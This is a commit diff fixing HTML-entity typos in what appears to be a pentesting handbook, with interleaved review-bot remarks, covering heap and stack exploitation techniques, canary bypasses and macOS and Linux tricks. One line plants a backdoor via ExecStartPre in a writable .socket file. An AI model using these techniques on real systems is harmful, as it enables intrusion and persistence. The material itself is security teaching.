more migration typos

This commit is contained in:
Carlos Polop 2025-01-05 21:30:07 +01:00
parent b1e3ef77e5
commit 972d01bc6b
89 changed files with 171 additions and 171 deletions

View File

@ -34,15 +34,15 @@ gef➤ p &__free_hook
[In the post](https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html) you can find a step by step guide on how to locate the address of the free hook without symbols. As summary, in the free function:
<pre class="language-armasm"><code class="lang-armasm">gef➤ x/20i free
0xf75dedc0 &#x3C;free>: push ebx
0xf75dedc1 &#x3C;free+1>: call 0xf768f625
0xf75dedc6 &#x3C;free+6>: add ebx,0x14323a
0xf75dedcc &#x3C;free+12>: sub esp,0x8
0xf75dedcf &#x3C;free+15>: mov eax,DWORD PTR [ebx-0x98]
0xf75dedd5 &#x3C;free+21>: mov ecx,DWORD PTR [esp+0x10]
<strong>0xf75dedd9 &#x3C;free+25>: mov eax,DWORD PTR [eax]--- BREAK HERE
</strong>0xf75deddb &#x3C;free+27>: test eax,eax ;&#x3C;
0xf75deddd &#x3C;free+29>: jne 0xf75dee50 &#x3C;free+144>
0xf75dedc0 <free>: push ebx
0xf75dedc1 <free+1>: call 0xf768f625
0xf75dedc6 <free+6>: add ebx,0x14323a
0xf75dedcc <free+12>: sub esp,0x8
0xf75dedcf <free+15>: mov eax,DWORD PTR [ebx-0x98]
0xf75dedd5 <free+21>: mov ecx,DWORD PTR [esp+0x10]
<strong>0xf75dedd9 <free+25>: mov eax,DWORD PTR [eax]--- BREAK HERE
</strong>0xf75deddb <free+27>: test eax,eax ;<
0xf75deddd <free+29>: jne 0xf75dee50 <free+144>
</code></pre>
In the mentioned break in the previous code in `$eax` will be located the address of the free hook.
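Review bot: decoding `&#x3C;free>` to `<free>` inside the raw `<pre class="language-armasm"><code>` block breaks the rendered output of lines `0xf75dedc0 <free>: push ebx` through `jne 0xf75dee50 <free+144>`. This is an HTML block, not a fenced code block, so a browser parses `<free>`, `<free+1>`, ... `<free+144>` as start tags (a tag name may contain `+` and digits) and drops them from the displayed text; only the addresses and instructions survive. The `&#x3C;` entities were what kept the symbols visible. Either keep them as `&lt;free>` inside the HTML block, or convert the whole block to a fenced ```armasm block, where `<` is literal and the `<strong>` markers can be dropped.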
@ -50,13 +50,13 @@ In the mentioned break in the previous code in `$eax` will be located the addres
Now a **fast bin attack** is performed:
- First of all it's discovered that it's possible to work with fast **chunks of size 200** in the **`__free_hook`** location:
- <pre class="language-c"><code class="lang-c">gef➤ p &#x26;__free_hook
$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 &#x3C;__free_hook>
- <pre class="language-c"><code class="lang-c">gef➤ p &__free_hook
$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
gef➤ x/60gx 0x7ff1e9e607a8 - 0x59
<strong>0x7ff1e9e6074f: 0x0000000000000000 0x0000000000000200
</strong>0x7ff1e9e6075f: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6076f &#x3C;list_all_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6077f &#x3C;_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6076f <list_all_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000
</code></pre>
- If we manage to get a fast chunk of size 0x200 in this location, it'll be possible to overwrite a function pointer that will be executed
- For this, a new chunk of size `0xfc` is created and the merged function is called with that pointer twice, this way we obtain a pointer to a freed chunk of size `0xfc*2 = 0x1f8` in the fast bin.
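Review bot: inside the raw `<pre class="language-c"><code>` block, `<list_all_lock+15>` will now be parsed by the browser as an HTML start tag and vanish from the rendered page, so the line reads `0x7ff1e9e6076f : 0x0000000000000000 ...`. `<__free_hook>` and `<_IO_stdfile_2_lock+15>` only survive because a tag name cannot start with `_`. Keep `&lt;` for the symbol names in this HTML block (and strictly `&amp;__free_hook` for the `p &__free_hook` line, although browsers tolerate the bare `&` there), or move the block to a fenced ```c block so the escaping question disappears.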

View File

@ -51,7 +51,7 @@ Note how `map -> l_addr + fini_array -> d_un.d_ptr` is used to **calculate** the
There are a **couple of options**:
- Overwrite the value of `map->l_addr` to make it point to a **fake `fini_array`** with instructions to execute arbitrary code
- Overwrite `l_info[DT_FINI_ARRAY]` and `l_info[DT_FINI_ARRAYSZ]` entries (which are more or less consecutive in memory) , to make them **points to a forged `Elf64_Dyn`** structure that will make again **`array` points to a memory** zone the attacker controlled.&#x20;
- Overwrite `l_info[DT_FINI_ARRAY]` and `l_info[DT_FINI_ARRAYSZ]` entries (which are more or less consecutive in memory) , to make them **points to a forged `Elf64_Dyn`** structure that will make again **`array` points to a memory** zone the attacker controlled.
- [**This writeup**](https://github.com/nobodyisnobody/write-ups/tree/main/DanteCTF.2023/pwn/Sentence.To.Hell) overwrites `l_info[DT_FINI_ARRAY]` with the address of a controlled memory in `.bss` containing a fake `fini_array`. This fake array contains **first a** [**one gadget**](../rop-return-oriented-programing/ret2lib/one-gadget.md) **address** which will be executed and then the **difference** between in the address of this **fake array** and the v**alue of `map->l_addr`** so `*array` will point to the fake array.
- According to main post of this technique and [**this writeup**](https://activities.tjhsst.edu/csc/writeups/angstromctf-2021-wallstreet) ld.so leave a pointer on the stack that points to the binary `link_map` in ld.so. With an arbitrary write it's possible to overwrite it and make it point to a fake `fini_array` controlled by the attacker with the address to a [**one gadget**](../rop-return-oriented-programing/ret2lib/one-gadget.md) for example.
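Review bot: since this line is being touched in a typo pass, the grammar in it could be fixed at the same time: "to make them **points to** a forged `Elf64_Dyn`" should read "point to", "make again **`array` points to** a memory zone" should read "point to", and the stray space in "in memory) ," belongs after the comma, not before it.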

View File

@ -89,7 +89,7 @@ Something to take into account is that usually **just one exploitation of a vuln
- **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and knowing the libc version** loaded, the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically.
- With [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **but no** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)**, knowing the libc and with the binary using the `system`** function it's possible to **`ret` to the address of system in the GOT** with the address of `'/bin/sh'` in the param (you will need to figure this out).
- With [ASLR](../common-binary-protections-and-bypasses/aslr/index.html) but no [PIE](../common-binary-protections-and-bypasses/pie/index.html), knowing the libc and **without the binary using the `system`** :
- Use [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) to resolve the address of `system` and call it&#x20;
- Use [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) to resolve the address of `system` and call it
- **Bypass** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) and calculate the address of `system` and `'/bin/sh'` in memory.
- **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) **and not knowing the libc**: You need to:
- Bypass [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)

View File

@ -47,7 +47,7 @@ Pointer mangling aims to **prevent partial and full pointer overwrites in heap**
### Algorithm Overview
The formula used for mangling and demangling pointers is:&#x20;
The formula used for mangling and demangling pointers is:
**`New_Ptr = (L >> 12) XOR P`**

View File

@ -8,7 +8,7 @@
### **How Memory Tagging Extension Works**
MTE operates by **dividing memory into small, fixed-size blocks, with each block assigned a tag,** typically a few bits in size.&#x20;
MTE operates by **dividing memory into small, fixed-size blocks, with each block assigned a tag,** typically a few bits in size.
When a pointer is created to point to that memory, it gets the same tag. This tag is stored in the **unused bits of a memory pointer**, effectively linking the pointer to its corresponding memory block.

View File

@ -107,7 +107,7 @@ log.info(f"The canary is: {canary}")
## Threads
Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-forc**e a canary if the binary spawns a new thread every time an attack happens.&#x20;
Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-forc**e a canary if the binary spawns a new thread every time an attack happens.
Moreover, a buffer **overflow in a threaded function** protected with canary could be used to **modify the master canary stored in the TLS**. This is because, it might be possible to reach the memory position where the TLS is stored (and therefore, the canary) via a **bof in the stack** of a thread.\
As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).\
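Review bot: in `it'll be possible to **brute-forc**e a canary` the closing `**` sits one character early, so the rendered text bolds "brute-forc" and leaves the trailing "e" plain. Move it to `**brute-force**`.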

View File

@ -12,7 +12,7 @@ With this info the attacker can **craft and send a new attack** knowing the cana
Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.
**CTF examples:**&#x20;
**CTF examples:**
- [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
- 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')`

View File

@ -107,7 +107,7 @@ In this example, if a user inputs a negative number, it will be interpreted as a
- Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection
- [https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html)
- Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one:&#x20;
- Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one:
```
(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569)

View File

@ -39,7 +39,7 @@ malloc-and-sysmalloc.md
- **Checks during small bin search:**
- If `victim->bk->fd != victim`:
- Error message: `malloc(): smallbin double linked list corrupted`
- **Checks during consolidate** performed for each fast bin chunk:&#x20;
- **Checks during consolidate** performed for each fast bin chunk:
- If the chunk is unaligned trigger:
- Error message: `malloc_consolidate(): unaligned fastbin chunk detected`
- If the chunk has a different size that the one it should because of the index it's in:
@ -47,7 +47,7 @@ malloc-and-sysmalloc.md
- If the previous chunk is not in use and the previous chunk has a size different of the one indicated by prev_chunk:
- Error message: `corrupted size vs. prev_size in fastbins`
- **Checks during unsorted bin search**:
- If the chunk size is weird (too small or too big):&#x20;
- If the chunk size is weird (too small or too big):
- Error message: `malloc(): invalid size (unsorted)`
- If the next chunk size is weird (too small or too big):
- Error message: `malloc(): invalid next size (unsorted)`

View File

@ -7,7 +7,7 @@
(No checks are explained in this summary and some case have been omitted for brevity)
1. `__libc_malloc` tries to get a chunk from the tcache, if not it calls `_int_malloc`
2. `_int_malloc` :&#x20;
2. `_int_malloc` :
1. Tries to generate the arena if there isn't any
2. If any fast bin chunk of the correct size, use it
1. Fill tcache with other fast chunks
@ -299,7 +299,7 @@ The first check is to find out if the requested size could be inside a small bin
Then, a security check is performed checking:
- &#x20;if `victim->bk->fd = victim`. To see that both chunks are correctly linked.
- if `victim->bk->fd = victim`. To see that both chunks are correctly linked.
In that case, the chunk **gets the `inuse` bit,** the doubled linked list is fixed so this chunk disappears from it (as it's going to be used), and the non main arena bit is set if needed.
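Review bot: `if victim->bk->fd = victim` uses a single `=`, which reads as an assignment, while the sentence describes a comparison. The same check is listed elsewhere in this diff as "If `victim->bk->fd != victim`: Error message: `malloc(): smallbin double linked list corrupted`", so write it as `victim->bk->fd == victim` to make the direction of the check unambiguous.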
@ -526,7 +526,7 @@ It's time to check the unsorted bin for a potential valid chunk to use.
#### Start
This starts with a big for look that will be traversing the unsorted bin in the `bk` direction until it arrives til the end (the arena struct) with `while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))`&#x20;
This starts with a big for look that will be traversing the unsorted bin in the `bk` direction until it arrives til the end (the arena struct) with `while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))`
Moreover, some security checks are perform every time a new chunk is considered:
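Review bot: the surviving line still carries typos that this commit could clean up: "a big for look" should be "a big loop" (the condition shown is a `while`, not a `for`), "til it arrives til the end" should be "until it arrives at the end", and in the trailing context "some security checks are perform" should be "are performed".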
@ -1249,7 +1249,7 @@ Then it also checks that:
### sysmalloc not main arena
It'll first try to **extend** the previous heap for this heap. If not possible try to **allocate a new heap** and update the pointers to be able to use it.\
Finally if that didn't work, try calling **`sysmalloc_mmap`**.&#x20;
Finally if that didn't work, try calling **`sysmalloc_mmap`**.
<details>

View File

@ -34,7 +34,7 @@
- The house of Einherjar finishes here
- This can be continued with a fast bin attack or Tcache poisoning:
- Free `B` to add it to the fast bin / Tcache
- `B`'s `fd` is overwritten making it point to the target address abusing the `D` chunk (as it contains `B` inside)&#x20;
- `B`'s `fd` is overwritten making it point to the target address abusing the `D` chunk (as it contains `B` inside)
- Then, 2 mallocs are done and the second one is going to be **allocating the target address**
## References and other examples

View File

@ -10,7 +10,7 @@
- This isn't working
- Or: [https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c)
- This isn't working even if it tries to bypass some checks getting the error: `malloc(): unaligned tcache chunk detected`
- This example is still working: [**https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html**](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html)&#x20;
- This example is still working: [**https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html**](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html)
### Goal

View File

@ -51,8 +51,8 @@ Current heap layout:
*/
```
- &#x20;`fastbin_victim` has a `fd` pointing to `relative_offset_heap`
- &#x20;`relative_offset_heap` is an offset of distance from `fake_libc_chunk`, which contains a pointer to `main_arena + 0x68`
- `fastbin_victim` has a `fd` pointing to `relative_offset_heap`
- `relative_offset_heap` is an offset of distance from `fake_libc_chunk`, which contains a pointer to `main_arena + 0x68`
- Just changing the last byte of `fastbin_victim.fd` it's possible to make `fastbin_victim points` to `main_arena + 0x68`
For the previous actions, the attacker needs to be capable of modifying the fd pointer of `fastbin_victim`.

View File

@ -50,13 +50,13 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
- Then, it's possible to call the edit function with the index 2 (the use after free pointer) and overwrite the `bk` pointer to point to `p64(global_max_fast-0x10)`. Then, creating a new chunk will use the previously compromised free address (0x20) will **trigger the unsorted bin attack** overwriting the `global_max_fast` which a very big value, allowing now to create chunks in fast bins.
- Now a **fast bin attack** is performed:
- First of all it's discovered that it's possible to work with fast **chunks of size 200** in the **`__free_hook`** location:
- <pre class="language-c"><code class="lang-c">gef➤ p &#x26;__free_hook
$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 &#x3C;__free_hook>
- <pre class="language-c"><code class="lang-c">gef➤ p &__free_hook
$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
gef➤ x/60gx 0x7ff1e9e607a8 - 0x59
<strong>0x7ff1e9e6074f: 0x0000000000000000 0x0000000000000200
</strong>0x7ff1e9e6075f: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6076f &#x3C;list_all_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6077f &#x3C;_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6076f <list_all_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000
</code></pre>
- If we manage to get a fast chunk of size 0x200 in this location, it'll be possible to overwrite a function pointer that will be executed
- For this, a new chunk of size `0xfc` is created and the merged function is called with that pointer twice, this way we obtain a pointer to a freed chunk of size `0xfc*2 = 0x1f8` in the fast bin.
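Review bot: same rendering problem in this copy of the `<pre class="language-c"><code>` block: `<list_all_lock+15>` is a valid HTML start tag, so once the `&#x3C;` entity is gone the browser swallows the symbol and the line renders without it, while `<__free_hook>` and `<_IO_stdfile_2_lock+15>` are only spared by their leading underscore. Use `&lt;` for symbols inside this HTML block or switch to a fenced ```c block.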

View File

@ -88,7 +88,7 @@ Similarly, if we know a function returns the address where the shellcode is stor
### Example
You can find some examples here:&#x20;
You can find some examples here:
- [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg)
- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c)

View File

@ -71,7 +71,7 @@ To find the address of the `win` function, you can use **gdb**, **objdump**, or
objdump -d vulnerable | grep win
```
This command will show you the assembly of the `win` function, including its starting address.&#x20;
This command will show you the assembly of the `win` function, including its starting address.
The Python script sends a carefully crafted message that, when processed by the `vulnerable_function`, overflows the buffer and overwrites the return address on the stack with the address of `win`. When `vulnerable_function` returns, instead of returning to `main` or exiting, it jumps to `win`, and the message is printed.

View File

@ -8,7 +8,7 @@ Find an introduction to arm64 in:
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
## Code&#x20;
## Code
```c
#include <stdio.h>

View File

@ -8,7 +8,7 @@ Find an introduction to arm64 in:
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
## Code&#x20;
## Code
```c
#include <stdio.h>
@ -31,7 +31,7 @@ Compile without pie, canary and nx:
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
```
## No ASLR & No canary - Stack Overflow&#x20;
## No ASLR & No canary - Stack Overflow
To stop ASLR execute:

View File

@ -574,7 +574,7 @@ ssh -D 9050 -p 2222 -l user 127.0.0.1
## ngrok
[**ngrok**](https://ngrok.com/) **is a tool to expose solutions to Internet in one command line.**\
_&#x45;xposition URI are like:_ **UID.ngrok.io**
_Exposition URI are like:_ **UID.ngrok.io**
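Review bot: only the `&#x45;` entity was decoded here, but the sentence itself is awkward: `_Exposition URI are like:_` would read better as `_Exposed URIs look like:_`, which fits a typo-cleanup commit.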
### Installation

View File

@ -196,7 +196,7 @@ You could access the **TLS certificate** of the main web page, obtain the **Orga
Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/index.html#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_&#x4E;ote that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## Subdomains
@ -539,7 +539,7 @@ Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdoma
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/index.html).
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/index.html#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_&#x4E;ote that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## IPs

View File

@ -538,7 +538,7 @@ Sockets can be configured using `.socket` files.
### Writable .socket files
If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\
_&#x4E;ote that the system must be using that socket file configuration or the backdoor won't be executed_
_Note that the system must be using that socket file configuration or the backdoor won't be executed_
### Writable sockets

View File

@ -62,7 +62,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/cgroup

View File

@ -54,7 +54,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/ipc

View File

@ -57,7 +57,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/mnt

View File

@ -57,7 +57,7 @@ docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
# Run ifconfig or ip -a
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/net

View File

@ -59,7 +59,7 @@ By mounting a new instance of the `/proc` filesystem if you use the param `--mou
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace are your process in
### Check which namespace are your process in
```bash
ls -l /proc/self/ns/pid
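Review bot: the heading `### Check which namespace are your process in` has a subject-verb mismatch; it should be "is your process in", which is also the wording the identical heading uses in the other namespace files touched by this diff (cgroup, ipc, mnt, net, time, user, uts).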

View File

@ -48,7 +48,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/time

View File

@ -59,7 +59,7 @@ docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
To use user namespace, Docker daemon needs to be started with **`--userns-remap=default`**(In ubuntu 14.04, this can be done by modifying `/etc/default/docker` and then executing `sudo service docker restart`)
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/user

View File

@ -54,7 +54,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/uts

View File

@ -6,7 +6,7 @@
Create a **dylib** with an **`__interpose`** section (or a section flagged with **`S_INTERPOSING`**) containing tuples of **function pointers** that refer to the **original** and the **replacement** functions.
Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](../macos-proces-abuse/macos-library-injection/index.html#check-restrictions).&#x20;
Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](../macos-proces-abuse/macos-library-injection/index.html#check-restrictions).
### Interpose printf
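Review bot: two grammar slips remain in the modified line: "the interposing needs occur before the main app loads" should be "needs to occur", and "the restrictions applied to the use of `DYLD_INSERT_LIBRARIES` applies here also" should be "apply here too" (plural subject).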

View File

@ -85,7 +85,7 @@ img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
```
### Download&#x20;
### Download
- [**KernelDebugKit Github**](https://github.com/dortania/KdkSupportPkg/releases)

View File

@ -476,7 +476,7 @@ settings set target.x86-disassembly-flavor intel
> [!WARNING]
> Inside lldb, dump a process with `process save-core`
<table data-header-hidden><thead><tr><th width="225"></th><th></th></tr></thead><tbody><tr><td><strong>(lldb) Command</strong></td><td><strong>Description</strong></td></tr><tr><td><strong>run (r)</strong></td><td>Starting execution, which will continue unabated until a breakpoint is hit or the process terminates.</td></tr><tr><td><strong>process launch --stop-at-entry</strong></td><td>Strt execution stopping at the entry point</td></tr><tr><td><strong>continue (c)</strong></td><td>Continue execution of the debugged process.</td></tr><tr><td><strong>nexti (n / ni)</strong></td><td>Execute the next instruction. This command will skip over function calls.</td></tr><tr><td><strong>stepi (s / si)</strong></td><td>Execute the next instruction. Unlike the nexti command, this command will step into function calls.</td></tr><tr><td><strong>finish (f)</strong></td><td>Execute the rest of the instructions in the current function (“frame”) return and halt.</td></tr><tr><td><strong>control + c</strong></td><td>Pause execution. If the process has been run (r) or continued (c), this will cause the process to halt ...wherever it is currently executing.</td></tr><tr><td><strong>breakpoint (b)</strong></td><td><p><code>b main</code> #Any func called main</p><p><code>b &#x3C;binname>`main</code> #Main func of the bin</p><p><code>b set -n main --shlib &#x3C;lib_name></code> #Main func of the indicated bin</p><p><code>breakpoint set -r '\[NSFileManager .*\]$'</code> #Any NSFileManager method</p><p><code>breakpoint set -r '\[NSFileManager contentsOfDirectoryAtPath:.*\]$'</code></p><p><code>break set -r . 
-s libobjc.A.dylib</code> # Break in all functions of that library</p><p><code>b -a 0x0000000100004bd9</code></p><p><code>br l</code> #Breakpoint list</p><p><code>br e/dis &#x3C;num></code> #Enable/Disable breakpoint</p><p>breakpoint delete &#x3C;num></p></td></tr><tr><td><strong>help</strong></td><td><p>help breakpoint #Get help of breakpoint command</p><p>help memory write #Get help to write into the memory</p></td></tr><tr><td><strong>reg</strong></td><td><p>reg read</p><p>reg read $rax</p><p>reg read $rax --format &#x3C;<a href="https://lldb.llvm.org/use/variable.html#type-format">format</a>></p><p>reg write $rip 0x100035cc0</p></td></tr><tr><td><strong>x/s &#x3C;reg/memory address></strong></td><td>Display the memory as a null-terminated string.</td></tr><tr><td><strong>x/i &#x3C;reg/memory address></strong></td><td>Display the memory as assembly instruction.</td></tr><tr><td><strong>x/b &#x3C;reg/memory address></strong></td><td>Display the memory as byte.</td></tr><tr><td><strong>print object (po)</strong></td><td><p>This will print the object referenced by the param</p><p>po $raw</p><p><code>{</code></p><p><code>dnsChanger = {</code></p><p><code>"affiliate" = "";</code></p><p><code>"blacklist_dns" = ();</code></p><p>Note that most of Apples Objective-C APIs or methods return objects, and thus should be displayed via the “print object” (po) command. 
If po doesn't produce a meaningful output use <code>x/b</code></p></td></tr><tr><td><strong>memory</strong></td><td>memory read 0x000....<br>memory read $x0+0xf2a<br>memory write 0x100600000 -s 4 0x41414141 #Write AAAA in that address<br>memory write -f s $rip+0x11f+7 "AAAA" #Write AAAA in the addr</td></tr><tr><td><strong>disassembly</strong></td><td><p>dis #Disas current function</p><p>dis -n &#x3C;funcname> #Disas func</p><p>dis -n &#x3C;funcname> -b &#x3C;basename> #Disas func<br>dis -c 6 #Disas 6 lines<br>dis -c 0x100003764 -e 0x100003768 # From one add until the other<br>dis -p -c 4 # Start in current address disassembling</p></td></tr><tr><td><strong>parray</strong></td><td>parray 3 (char **)$x1 # Check array of 3 components in x1 reg</td></tr><tr><td><strong>image dump sections</strong></td><td>Print map of the current process memory</td></tr><tr><td><strong>image dump symtab &#x3C;library></strong></td><td><code>image dump symtab CoreNLP</code> #Get the address of all the symbols from CoreNLP</td></tr></tbody></table>
<table data-header-hidden><thead><tr><th width="225"></th><th></th></tr></thead><tbody><tr><td><strong>(lldb) Command</strong></td><td><strong>Description</strong></td></tr><tr><td><strong>run (r)</strong></td><td>Starting execution, which will continue unabated until a breakpoint is hit or the process terminates.</td></tr><tr><td><strong>process launch --stop-at-entry</strong></td><td>Strt execution stopping at the entry point</td></tr><tr><td><strong>continue (c)</strong></td><td>Continue execution of the debugged process.</td></tr><tr><td><strong>nexti (n / ni)</strong></td><td>Execute the next instruction. This command will skip over function calls.</td></tr><tr><td><strong>stepi (s / si)</strong></td><td>Execute the next instruction. Unlike the nexti command, this command will step into function calls.</td></tr><tr><td><strong>finish (f)</strong></td><td>Execute the rest of the instructions in the current function (“frame”) return and halt.</td></tr><tr><td><strong>control + c</strong></td><td>Pause execution. If the process has been run (r) or continued (c), this will cause the process to halt ...wherever it is currently executing.</td></tr><tr><td><strong>breakpoint (b)</strong></td><td><p><code>b main</code> #Any func called main</p><p><code>b <binname>`main</code> #Main func of the bin</p><p><code>b set -n main --shlib <lib_name></code> #Main func of the indicated bin</p><p><code>breakpoint set -r '\[NSFileManager .*\]$'</code> #Any NSFileManager method</p><p><code>breakpoint set -r '\[NSFileManager contentsOfDirectoryAtPath:.*\]$'</code></p><p><code>break set -r . 
-s libobjc.A.dylib</code> # Break in all functions of that library</p><p><code>b -a 0x0000000100004bd9</code></p><p><code>br l</code> #Breakpoint list</p><p><code>br e/dis <num></code> #Enable/Disable breakpoint</p><p>breakpoint delete <num></p></td></tr><tr><td><strong>help</strong></td><td><p>help breakpoint #Get help of breakpoint command</p><p>help memory write #Get help to write into the memory</p></td></tr><tr><td><strong>reg</strong></td><td><p>reg read</p><p>reg read $rax</p><p>reg read $rax --format <<a href="https://lldb.llvm.org/use/variable.html#type-format">format</a>></p><p>reg write $rip 0x100035cc0</p></td></tr><tr><td><strong>x/s <reg/memory address></strong></td><td>Display the memory as a null-terminated string.</td></tr><tr><td><strong>x/i <reg/memory address></strong></td><td>Display the memory as assembly instruction.</td></tr><tr><td><strong>x/b <reg/memory address></strong></td><td>Display the memory as byte.</td></tr><tr><td><strong>print object (po)</strong></td><td><p>This will print the object referenced by the param</p><p>po $raw</p><p><code>{</code></p><p><code>dnsChanger = {</code></p><p><code>"affiliate" = "";</code></p><p><code>"blacklist_dns" = ();</code></p><p>Note that most of Apples Objective-C APIs or methods return objects, and thus should be displayed 